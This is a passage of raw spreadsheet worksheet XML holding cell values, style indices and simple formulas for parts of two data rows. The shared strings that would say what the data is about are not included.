        <v>719839.0</v>
      </c>
      <c r="FW123" s="112">
        <v>28560.0</v>
      </c>
      <c r="FX123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FY123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FZ123" s="112">
        <v>0.0</v>
      </c>
      <c r="GA123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GB123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GC123" s="112">
        <v>6950.0</v>
      </c>
      <c r="GD123" s="112">
        <v>27776.0</v>
      </c>
      <c r="GE123" s="112">
        <v>719839.0</v>
      </c>
      <c r="GF123" s="112">
        <v>28543.0</v>
      </c>
      <c r="GG123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GH123" s="113">
        <f t="shared" si="193"/>
        <v>0.9998561358</v>
      </c>
      <c r="GI123" s="113">
        <f t="shared" si="194"/>
        <v>0.9998561358</v>
      </c>
      <c r="GJ123" s="113" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="GK123" s="113">
        <f t="shared" si="196"/>
        <v>0.03958321165</v>
      </c>
      <c r="GL123" s="113">
        <f t="shared" si="197"/>
        <v>0.03957039002</v>
      </c>
      <c r="GM123" s="113" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="GN123" s="113" t="str">
        <f t="shared" si="199"/>
        <v>-</v>
      </c>
      <c r="GO123" s="113" t="str">
        <f t="shared" si="200"/>
        <v>-</v>
      </c>
      <c r="GP123" s="113" t="str">
        <f t="shared" si="201"/>
        <v>-</v>
      </c>
      <c r="GQ123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GR123" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GS123" s="142" t="s">
        <v>225</v>
      </c>
      <c r="GT123" s="94" t="s">
        <v>2090</v>
      </c>
      <c r="GU123" s="116" t="s">
        <v>2091</v>
      </c>
      <c r="GV123" s="116">
        <v>6.0</v>
      </c>
      <c r="GW123" s="116">
        <v>611.0</v>
      </c>
      <c r="GX123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD123" s="131" t="s">
        <v>2091</v>
      </c>
      <c r="HE123" s="131" t="s">
        <v>2091</v>
      </c>
      <c r="HF123" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG123" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH123" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI123" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ123" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK123" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL123" s="93">
        <v>6925.0</v>
      </c>
      <c r="HM123" s="93">
        <f t="shared" si="83"/>
        <v>373</v>
      </c>
      <c r="HN123" s="93">
        <v>373.0</v>
      </c>
      <c r="HO123" s="93">
        <v>0.0</v>
      </c>
      <c r="HP123" s="93">
        <v>373.0</v>
      </c>
      <c r="HQ123" s="118">
        <f t="shared" si="53"/>
        <v>0.05366134369</v>
      </c>
      <c r="HR123" s="118">
        <f t="shared" si="54"/>
        <v>0.05366134369</v>
      </c>
      <c r="HS123" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT123" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU123" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV123" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW123" s="119">
        <v>1.0</v>
      </c>
      <c r="HX123" s="119">
        <v>697509.0</v>
      </c>
      <c r="HY123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID123" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE123" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH123" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II123" s="99" t="s">
        <v>2092</v>
      </c>
      <c r="IJ123" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK123" s="99">
        <v>7101.0</v>
      </c>
      <c r="IL123" s="99">
        <v>6949.0</v>
      </c>
      <c r="IM123" s="121">
        <f t="shared" si="159"/>
        <v>6949</v>
      </c>
      <c r="IN123" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO123" s="98">
        <v>6949.0</v>
      </c>
      <c r="IP123" s="123">
        <f t="shared" si="58"/>
        <v>0.9997122716</v>
      </c>
      <c r="IQ123" s="118">
        <f t="shared" si="59"/>
        <v>0.9997122716</v>
      </c>
      <c r="IR123" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS123" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT123" s="127"/>
      <c r="IU123" s="127"/>
      <c r="IV123" s="127"/>
      <c r="IW123" s="127"/>
      <c r="IX123" s="127"/>
      <c r="IY123" s="127"/>
      <c r="IZ123" s="127"/>
      <c r="JA123" s="127"/>
      <c r="JB123" s="127"/>
      <c r="JC123" s="127"/>
      <c r="JD123" s="127"/>
      <c r="JE123" s="127"/>
      <c r="JF123" s="127"/>
      <c r="JG123" s="127"/>
      <c r="JH123" s="127"/>
      <c r="JI123" s="127"/>
      <c r="JJ123" s="127"/>
      <c r="JK123" s="127"/>
      <c r="JL123" s="127"/>
      <c r="JM123" s="127"/>
      <c r="JN123" s="127"/>
      <c r="JO123" s="127"/>
      <c r="JP123" s="127"/>
      <c r="JQ123" s="127"/>
      <c r="JR123" s="127"/>
      <c r="JS123" s="127"/>
      <c r="JT123" s="127"/>
      <c r="JU123" s="127"/>
      <c r="JV123" s="127"/>
      <c r="JW123" s="127"/>
      <c r="JX123" s="127"/>
      <c r="JY123" s="127"/>
      <c r="JZ123" s="127"/>
      <c r="KA123" s="127"/>
      <c r="KB123" s="127"/>
      <c r="KC123" s="127"/>
      <c r="KD123" s="127"/>
      <c r="KE123" s="127"/>
      <c r="KF123" s="127"/>
      <c r="KG123" s="127"/>
      <c r="KH123" s="127"/>
      <c r="KI123" s="127"/>
      <c r="KJ123" s="127"/>
      <c r="KK123" s="127"/>
      <c r="KL123" s="127"/>
      <c r="KM123" s="127"/>
      <c r="KN123" s="127"/>
      <c r="KO123" s="127"/>
      <c r="KP123" s="127"/>
      <c r="KQ123" s="127"/>
      <c r="KR123" s="127"/>
      <c r="KS123" s="127"/>
      <c r="KT123" s="127"/>
      <c r="KU123" s="127"/>
      <c r="KV123" s="127"/>
      <c r="KW123" s="127"/>
      <c r="KX123" s="127"/>
      <c r="KY123" s="127"/>
      <c r="KZ123" s="127"/>
      <c r="LA123" s="127"/>
      <c r="LB123" s="127"/>
      <c r="LC123" s="127"/>
      <c r="LD123" s="127"/>
      <c r="LE123" s="127"/>
      <c r="LF123" s="127"/>
      <c r="LG123" s="127"/>
      <c r="LH123" s="127"/>
      <c r="LI123" s="127"/>
      <c r="LJ123" s="127"/>
      <c r="LK123" s="127"/>
      <c r="LL123" s="127"/>
      <c r="LM123" s="127"/>
      <c r="LN123" s="127"/>
      <c r="LO123" s="127"/>
      <c r="LP123" s="127"/>
      <c r="LQ123" s="127"/>
      <c r="LR123" s="127"/>
      <c r="LS123" s="127"/>
      <c r="LT123" s="127"/>
      <c r="LU123" s="127"/>
      <c r="LV123" s="127"/>
      <c r="LW123" s="127"/>
      <c r="LX123" s="127"/>
      <c r="LY123" s="127"/>
      <c r="LZ123" s="127"/>
      <c r="MA123" s="127"/>
      <c r="MB123" s="127"/>
      <c r="MC123" s="127"/>
      <c r="MD123" s="127"/>
      <c r="ME123" s="127"/>
      <c r="MF123" s="127"/>
      <c r="MG123" s="127"/>
      <c r="MH123" s="127"/>
      <c r="MI123" s="127"/>
      <c r="MJ123" s="127"/>
      <c r="MK123" s="127"/>
      <c r="ML123" s="127"/>
      <c r="MM123" s="127"/>
      <c r="MN123" s="127"/>
      <c r="MO123" s="127"/>
      <c r="MP123" s="127"/>
      <c r="MQ123" s="127"/>
      <c r="MR123" s="127"/>
      <c r="MS123" s="127"/>
      <c r="MT123" s="127"/>
      <c r="MU123" s="127"/>
      <c r="MV123" s="127"/>
      <c r="MW123" s="127"/>
      <c r="MX123" s="127"/>
      <c r="MY123" s="127"/>
      <c r="MZ123" s="127"/>
      <c r="NA123" s="127"/>
      <c r="NB123" s="127"/>
      <c r="NC123" s="127"/>
      <c r="ND123" s="127"/>
      <c r="NE123" s="127"/>
      <c r="NF123" s="127"/>
      <c r="NG123" s="127"/>
      <c r="NH123" s="127"/>
      <c r="NI123" s="127"/>
      <c r="NJ123" s="127"/>
      <c r="NK123" s="127"/>
      <c r="NL123" s="127"/>
      <c r="NM123" s="127"/>
      <c r="NN123" s="127"/>
      <c r="NO123" s="127"/>
      <c r="NP123" s="127"/>
      <c r="NQ123" s="127"/>
      <c r="NR123" s="127"/>
      <c r="NS123" s="127"/>
      <c r="NT123" s="127"/>
      <c r="NU123" s="127"/>
      <c r="NV123" s="127"/>
      <c r="NW123" s="127"/>
      <c r="NX123" s="127"/>
      <c r="NY123" s="127"/>
    </row>
    <row r="124" ht="153.75" customHeight="1">
      <c r="B124" s="89" t="s">
        <v>2093</v>
      </c>
      <c r="C124" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D124" s="90" t="s">
        <v>2094</v>
      </c>
      <c r="E124" s="90" t="s">
        <v>2095</v>
      </c>
      <c r="F124" s="90" t="s">
        <v>2096</v>
      </c>
      <c r="G124" s="90" t="s">
        <v>2097</v>
      </c>
      <c r="H124" s="151" t="s">
        <v>2098</v>
      </c>
      <c r="I124" s="92" t="s">
        <v>2099</v>
      </c>
      <c r="J124" s="92" t="s">
        <v>2100</v>
      </c>
      <c r="K124" s="92" t="s">
        <v>2101</v>
      </c>
      <c r="L124" s="93" t="s">
        <v>1672</v>
      </c>
      <c r="M124" s="93">
        <v>7.0</v>
      </c>
      <c r="N124" s="93">
        <v>1.0</v>
      </c>
      <c r="O124" s="93">
        <v>0.0</v>
      </c>
      <c r="P124" s="93">
        <v>1.0</v>
      </c>
      <c r="Q124" s="93">
        <f t="shared" ref="Q124:Q139" si="204">R124+S124</f>
        <v>1</v>
      </c>
      <c r="R124" s="93">
        <v>1.0</v>
      </c>
      <c r="S124" s="93">
        <v>0.0</v>
      </c>
      <c r="T124" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U124" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V124" s="96" t="s">
        <v>2102</v>
      </c>
      <c r="W124" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X124" s="97" t="s">
        <v>2103</v>
      </c>
      <c r="Y124" s="96" t="s">
        <v>2104</v>
      </c>
      <c r="Z124" s="96" t="s">
        <v>2105</v>
      </c>
      <c r="AA124" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB124" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC124" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD124" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE124" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF124" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG124" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH124" s="99" t="s">
        <v>2106</v>
      </c>
      <c r="AI124" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ124" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL124" s="100">
        <v>0.0</v>
      </c>
      <c r="AM124" s="100">
        <v>0.0</v>
      </c>
      <c r="AN124" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP124" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ124" s="100">
        <v>0.0</v>
      </c>
      <c r="AR124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT124" s="100" t="str">
        <f t="shared" ref="AT124:AT125" si="205">IF(AR124="-",AS124,AR124)</f>
        <v>-</v>
      </c>
      <c r="AU124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX124" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY124" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ124" s="100">
        <v>0.0</v>
      </c>
      <c r="BA124" s="102">
        <v>7.0</v>
      </c>
      <c r="BB124" s="102">
        <v>0.0</v>
      </c>
      <c r="BC124" s="102">
        <v>0.0</v>
      </c>
      <c r="BD124" s="102">
        <v>0.0</v>
      </c>
      <c r="BE124" s="102">
        <v>0.0</v>
      </c>
      <c r="BF124" s="102">
        <v>0.0</v>
      </c>
      <c r="BG124" s="102">
        <v>0.0</v>
      </c>
      <c r="BH124" s="102">
        <v>0.0</v>
      </c>
      <c r="BI124" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ124" s="102">
        <v>0.0</v>
      </c>
      <c r="BK124" s="102">
        <v>0.0</v>
      </c>
      <c r="BL124" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM124" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN124" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO124" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP124" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ124" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR124" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS124" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT124" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU124" s="103">
        <f t="shared" ref="BU124:BU125" si="206">(BE124+BF124)/(N124+O124)</f>
        <v>0</v>
      </c>
      <c r="BV124" s="103">
        <f t="shared" ref="BV124:BV125" si="207">IF(OR(BN124=0,BN124="-"),0,1)</f>
        <v>0</v>
      </c>
      <c r="BW124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX124" s="104">
        <v>0.0</v>
      </c>
      <c r="BY124" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ124" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB124" s="104">
        <v>0.0</v>
      </c>
      <c r="CC124" s="104">
        <v>0.0</v>
      </c>
      <c r="CD124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF124" s="104" t="str">
        <f t="shared" si="203"/>
        <v>-</v>
      </c>
      <c r="CG124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ124" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK124" s="104">
        <v>0.0</v>
      </c>
      <c r="CL124" s="104">
        <v>0.0</v>
      </c>
      <c r="CM124" s="105">
        <v>7.0</v>
      </c>
      <c r="CN124" s="105">
        <v>0.0</v>
      </c>
      <c r="CO124" s="105">
        <v>0.0</v>
      </c>
      <c r="CP124" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ124" s="105">
        <v>0.0</v>
      </c>
      <c r="CR124" s="105">
        <v>0.0</v>
      </c>
      <c r="CS124" s="105">
        <v>0.0</v>
      </c>
      <c r="CT124" s="105">
        <v>0.0</v>
      </c>
      <c r="CU124" s="105">
        <v>0.0</v>
      </c>
      <c r="CV124" s="105">
        <v>0.0</v>
      </c>
      <c r="CW124" s="105">
        <v>0.0</v>
      </c>
      <c r="CX124" s="105">
        <v>0.0</v>
      </c>
      <c r="CY124" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ124" s="105">
        <v>0.0</v>
      </c>
      <c r="DA124" s="105">
        <v>0.0</v>
      </c>
      <c r="DB124" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC124" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD124" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE124" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF124" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG124" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH124" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI124" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ124" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK124" s="107">
        <f t="shared" ref="DK124:DK125" si="208">(CS124+CT124)/(N124+O124)</f>
        <v>0</v>
      </c>
      <c r="DL124" s="106">
        <f t="shared" ref="DL124:DL125" si="209">IF(AND(OR(DD124=0,DD124="-"),DK124=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="DM124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN124" s="108">
        <v>0.0</v>
      </c>
      <c r="DO124" s="108">
        <v>0.0</v>
      </c>
      <c r="DP124" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR124" s="108">
        <v>0.0</v>
      </c>
      <c r="DS124" s="108">
        <v>0.0</v>
      </c>
      <c r="DT124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV124" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ124" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA124" s="108">
        <v>0.0</v>
      </c>
      <c r="EB124" s="108">
        <v>0.0</v>
      </c>
      <c r="EC124" s="109">
        <v>7.0</v>
      </c>
      <c r="ED124" s="109">
        <v>0.0</v>
      </c>
      <c r="EE124" s="109">
        <v>0.0</v>
      </c>
      <c r="EF124" s="109">
        <v>0.0</v>
      </c>
      <c r="EG124" s="109">
        <v>0.0</v>
      </c>
      <c r="EH124" s="109">
        <v>0.0</v>
      </c>
      <c r="EI124" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ124" s="109">
        <v>0.0</v>
      </c>
      <c r="EK124" s="109">
        <v>0.0</v>
      </c>
      <c r="EL124" s="109">
        <v>0.0</v>
      </c>
      <c r="EM124" s="109">
        <v>0.0</v>
      </c>
      <c r="EN124" s="109">
        <v>0.0</v>
      </c>
      <c r="EO124" s="109">
        <v>0.0</v>
      </c>
      <c r="EP124" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ124" s="109">
        <v>0.0</v>
      </c>
      <c r="ER124" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES124" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET124" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU124" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV124" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW124" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX124" s="110">
        <f t="shared" si="190"/>
        <v>0</v>
      </c>
      <c r="EY124" s="110">
        <f t="shared" si="191"/>
        <v>0</v>
      </c>
      <c r="EZ124" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA124" s="110">
        <f t="shared" ref="FA124:FA125" si="210">(EI124+EJ124)/(N124+O124)</f>
        <v>0</v>
      </c>
      <c r="FB124" s="110">
        <f t="shared" ref="FB124:FB125" si="211">IF(AND(OR(ET124=0,ET124="-"),FA124=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="FC124" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FD124" s="111">
        <v>2.0</v>
      </c>
      <c r="FE124" s="111">
        <v>3.0</v>
      </c>
      <c r="FF124" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG124" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH124" s="111">
        <v>0.0</v>
      </c>
      <c r="FI124" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ124" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK124" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL124" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM124" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN124" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO124" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP124" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ124" s="111">
        <v>0.0</v>
      </c>
      <c r="FR124" s="111">
        <v>0.0</v>
      </c>
      <c r="FS124" s="112">
        <v>7.0</v>
      </c>
      <c r="FT124" s="112">
        <v>1.0</v>
      </c>
      <c r="FU124" s="112">
        <v>1.0</v>
      </c>
      <c r="FV124" s="112">
        <v>0.0</v>
      </c>
      <c r="FW124" s="112">
        <v>1.0</v>
      </c>
      <c r="FX124" s="112">
        <v>1.0</v>
      </c>
      <c r="FY124" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ124" s="112">
        <v>0.0</v>
      </c>
      <c r="GA124" s="112">
        <v>0.0</v>
      </c>
      <c r="GB124" s="112">
        <v>0.0</v>
      </c>
      <c r="GC124" s="112">
        <v>0.0</v>
      </c>
      <c r="GD124" s="112">
        <v>0.0</v>
      </c>
      <c r="GE124" s="112">
        <v>0.0</v>
      </c>
      <c r="GF124" s="112">
        <v>0.0</v>
      </c>
      <c r="GG124" s="112">
        <v>0.0</v>
      </c>
      <c r="GH124" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI124" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ124" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK124" s="113">
        <f t="shared" si="196"/>
        <v>1</v>
      </c>
      <c r="GL124" s="113">
        <f t="shared" si="197"/>
        <v>0</v>
      </c>
      <c r="GM124" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN124" s="113">
        <f t="shared" si="199"/>
        <v>1</v>
      </c>
      <c r="GO124" s="113">
        <f t="shared" si="200"/>
        <v>0</v>
      </c>
      <c r="GP124" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ124" s="114">
        <f t="shared" ref="GQ124:GQ125" si="212">(FY124+FZ124)/(N124+O124)</f>
        <v>0</v>
      </c>
      <c r="GR124" s="113">
        <f t="shared" ref="GR124:GR125" si="213">IF(AND(OR(GJ124=0,GJ124="-"),GQ124=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="GS124" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT124" s="94"/>
      <c r="GU124" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV124" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW124" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF124" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG124" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH124" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI124" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ124" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK124" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL124" s="93">
        <v>7.0</v>
      </c>
      <c r="HM124" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN124" s="93">
        <v>0.0</v>
      </c>
      <c r="HO124" s="93">
        <v>0.0</v>
      </c>
      <c r="HP124" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ124" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR124" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS124" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT124" s="139" t="s">
        <v>2107</v>
      </c>
      <c r="HU124" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV124" s="119">
        <v>56953.0</v>
      </c>
      <c r="HW124" s="119">
        <v>1.0</v>
      </c>
      <c r="HX124" s="119">
        <v>7.0</v>
      </c>
      <c r="HY124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC124" s="120">
        <f>HV124</f>
        <v>56953</v>
      </c>
      <c r="ID124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF124" s="120">
        <v>56953.0</v>
      </c>
      <c r="IG124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH124" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II124" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ124" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK124" s="99">
        <v>7.0</v>
      </c>
      <c r="IL124" s="99">
        <v>0.0</v>
      </c>
      <c r="IM124" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN124" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO124" s="98">
        <v>1.0</v>
      </c>
      <c r="IP124" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ124" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR124" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS124" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT124" s="127"/>
      <c r="IU124" s="127"/>
      <c r="IV124" s="127"/>
      <c r="IW124" s="127"/>
      <c r="IX124" s="127"/>
      <c r="IY124" s="127"/>
      <c r="IZ124" s="127"/>
      <c r="JA124" s="127"/>
      <c r="JB124" s="127"/>
      <c r="JC124" s="127"/>
      <c r="JD124" s="127"/>
      <c r="JE124" s="127"/>
      <c r="JF124" s="127"/>
      <c r="JG124" s="127"/>
      <c r="JH124" s="127"/>
      <c r="JI124" s="127"/>
      <c r="JJ124" s="127"/>
      <c r="JK124" s="127"/>
      <c r="JL124" s="127"/>
      <c r="JM124" s="127"/>
      <c r="JN124" s="127"/>
      <c r="JO124" s="127"/>
      <c r="JP124" s="127"/>
      <c r="JQ124" s="127"/>
      <c r="JR124" s="127"/>
      <c r="JS124" s="127"/>
      <c r="JT124" s="127"/>
      <c r="JU124" s="127"/>
      <c r="JV124" s="127"/>
      <c r="JW124" s="127"/>
      <c r="JX124" s="127"/>
      <c r="JY124" s="127"/>
      <c r="JZ124" s="127"/>
      <c r="KA124" s="127"/>
      <c r="KB124" s="127"/>
      <c r="KC124" s="127"/>
      <c r="KD124" s="127"/>
      <c r="KE124" s="127"/>
      <c r="KF124" s="127"/>
      <c r="KG124" s="127"/>
      <c r="KH124" s="127"/>
      <c r="KI124" s="127"/>
      <c r="KJ124" s="127"/>
      <c r="KK124" s="127"/>
      <c r="KL124" s="127"/>
      <c r="KM124" s="127"/>
      <c r="KN124" s="127"/>
      <c r="KO124" s="127"/>
      <c r="KP124" s="127"/>
      <c r="KQ124" s="127"/>
      <c r="KR124" s="127"/>
      <c r="KS124" s="127"/>
      <c r="KT124" s="127"/>
      <c r="KU124" s="127"/>
      <c r="KV124" s="127"/>
      <c r="KW124" s="127"/>
      <c r="KX124" s="127"/>
      <c r="KY124" s="127"/>
      <c r="KZ124" s="127"/>
      <c r="LA124" s="127"/>
      <c r="LB124" s="127"/>
      <c r="LC124" s="127"/>
      <c r="LD124" s="127"/>
      <c r="LE124" s="127"/>
      <c r="LF124" s="127"/>
      <c r="LG124" s="127"/>
      <c r="LH124" s="127"/>
      <c r="LI124" s="127"/>
      <c r="LJ124" s="127"/>
      <c r="LK124" s="127"/>
      <c r="LL124" s="127"/>
      <c r="LM124" s="127"/>
